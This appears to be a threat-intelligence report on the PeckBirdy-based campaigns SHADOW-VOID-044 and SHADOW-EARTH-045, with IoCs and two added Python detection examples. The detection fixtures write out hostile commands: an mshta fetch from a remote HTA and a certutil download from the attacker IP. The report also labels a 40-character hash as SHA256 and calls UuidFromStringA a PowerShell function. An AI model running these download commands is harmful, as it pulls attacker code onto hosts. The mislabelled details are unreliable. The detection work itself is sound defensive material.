This report summarises two threat campaigns that use the PeckBirdy JavaScript framework, attributed to China-aligned advanced persistent threat (APT) actors. The campaigns, provisionally tracked as SHADOW-VOID-044 and SHADOW-EARTH-045, illustrate the growing sophistication and adaptability of these groups.

Analysis of the SHADOW-VOID-044 Campaign

The SHADOW-VOID-044 campaign has been linked to the UNC3569 threat actor with moderate to high confidence, based on overlapping TTPs and victimology.

  • Link to UNC3569: Observed use of the GRAYRABBIT backdoor, previously associated with UNC3569. The Command and Control (C&C) server center.myrnicrosoft.com is the same one used by UNC3569, and the campaign target (Chinese gaming industry) matches the known targets of this actor. The GRAYRABBIT implementation in this campaign uses a DLL sideloading technique combined with the UuidFromStringA PowerShell function.
  • Link to TheWizard: The campaign also deployed the HOLODONUT backdoor. Some HOLODONUT samples connected to the same C&C server (mkdmcdn.com) used by the APT group TheWizard. TheWizard has also used the DarkNimbus backdoor, associated with the Earth Minotaur actor.
  • Stolen Certificate: SHADOW-VOID-044 used a Cobalt Strike sample signed with a certificate stolen from a South Korean game company. This same certificate was used in the BIOPASS RAT campaign, linked to the actor Earth Lusca.
  • Infection Detection Technique: The BIOPASS RAT and MKDOOR campaigns verify infection by opening a local HTTP server on a high port, so that the watering hole attack script can scan for it and confirm that the backdoor is present on the host.
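A defender-side check for the infection-verification technique above, added here as an example and not part of the original report: it parses constructed `netstat -ano`-style output and flags high-port listeners owned by processes outside a hypothetical allowlist.

```python
"""Flag unexpected high-port listeners from netstat-style output.

Added example, not from the report. Input lines are constructed in the
layout of `netstat -ano` on Windows; the PID-to-image map stands in
for `tasklist` output on the same host.
"""
import re

# Constructed sample: proto, local address, remote address, state, PID.
NETSTAT_SAMPLE = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:43990        0.0.0.0:0              LISTENING       5128
  TCP    127.0.0.1:49664        0.0.0.0:0              LISTENING       1480
  TCP    10.0.0.5:52011         10.0.0.9:443           ESTABLISHED     3344
"""

# Constructed PID-to-image map for the same host.
PID_TO_IMAGE = {912: "svchost.exe", 4: "System", 5128: "updater.exe",
                1480: "lsass.exe", 3344: "chrome.exe"}

# Hypothetical allowlist of images expected to hold listeners; tune per host.
EXPECTED_LISTENERS = {"System", "svchost.exe", "lsass.exe", "services.exe"}

LINE_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def parse_listeners(netstat_text):
    """Return (address, port, pid) for every TCP LISTENING line."""
    out = []
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            out.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return out


def suspicious_high_port_listeners(netstat_text, pid_to_image, expected, min_port=1024):
    """High-port listeners owned by a process outside the allowlist.

    The Windows service on 49664 (lsass.exe) is excluded by the allowlist,
    not by port range: the backdoor picks its own port and can land there too.
    """
    findings = []
    for addr, port, pid in parse_listeners(netstat_text):
        image = pid_to_image.get(pid, "<unknown>")
        if port >= min_port and image not in expected:
            findings.append({"addr": addr, "port": port, "pid": pid, "image": image})
    return findings
```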

Analysis of the SHADOW-EARTH-045 Campaign

This campaign targeted a Filipino educational institution in July 2024.

  • TTPs: The threat actor ran an MSHTA command that connected to github.githubassets.net and launched PeckBirdy on a compromised IIS server. At the same time, files were downloaded from the IP address 47.238.184.9, previously linked to Earth Baxia (although that attribution is low confidence).
  • Global Link: The same PeckBirdy domain and IP address used were also reported in attacks against an African government IT organization.
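The MSHTA-from-IIS pattern above, as an added detection example (not the report's own code): it triages constructed Sysmon-style process-creation events, flags mshta.exe launched with a remote URL or by a web-server worker, and matches the report's domain and IP; the parent-process list and sample events are assumptions.

```python
"""Triage process-creation events for the MSHTA-from-IIS pattern.

Added example, not from the report. Events are constructed in Sysmon
Event ID 1 style; only the domain and IP come from the report.
"""
import re

# IoCs quoted in the report for SHADOW-EARTH-045.
REPORT_IOCS = {"github.githubassets.net", "47.238.184.9"}

# Constructed sample events; w3wp.exe as parent models the compromised IIS server.
EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://github.githubassets.net/x.hta",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://47.238.184.9/a.bin a.bin",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://([^/\s:]+)")
# Server-side parents that should never spawn script hosts (hypothetical list).
WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe"}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of reasons this event is suspicious (empty if benign)."""
    reasons = []
    image = _basename(event["Image"])
    parent = _basename(event["ParentImage"])
    hosts = {h.lower() for h in URL_RE.findall(event["CommandLine"])}
    if image == "mshta.exe" and hosts:
        reasons.append("mshta_remote_url")  # LOLBin fetching a remote HTA
    if image == "mshta.exe" and parent in WEB_SERVER_PARENTS:
        reasons.append("script_host_from_web_server")  # IIS worker spawning mshta
    if hosts & REPORT_IOCS:
        reasons.append("ioc_match:" + ",".join(sorted(hosts & REPORT_IOCS)))
    return reasons


def triage(events):
    """Map each flagged event's index to its reasons."""
    return {i: r for i, e in enumerate(events) if (r := classify(e))}
```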

Conclusions and Detection Challenges

The PeckBirdy framework illustrates how attack techniques keep evolving. It relies on living-off-the-land binary (LOLBin) techniques to bypass traditional endpoint defenses and deploy modular backdoors such as MKDOOR and HOLODONUT.

Detecting malicious JavaScript frameworks like PeckBirdy is a significant challenge because of:

  • Dynamic code generation.
  • Code injection at runtime.
  • No persistent file artifacts.

References

  • Threat Actors: SHADOW-VOID-044, SHADOW-EARTH-045, UNC3569, TheWizard, Earth Minotaur, Earth Lusca, Earth Baxia.
  • Backdoors and Frameworks: PeckBirdy, GRAYRABBIT, HOLODONUT, MKDOOR, BIOPASS RAT, Cobalt Strike.
  • Indicators of Compromise (IoCs):
    • center.myrnicrosoft.com (C&C UNC3569)
    • mkdmcdn.com (C&C TheWizard)
    • IP: 47.238.184.9 (Earth Baxia)
    • Domain: oss-cdn.com (SHADOW-VOID-044 server)
    • Certificate (SHA1): bbd2b9b87f968ed88210d4261a1fe30711e8365b (stolen, used in BIOPASS RAT)
    • HASH (SHA256): 162cc325ab7b6e70edb6f4d0bc0e52130c56903f (Cobalt Strike sample)
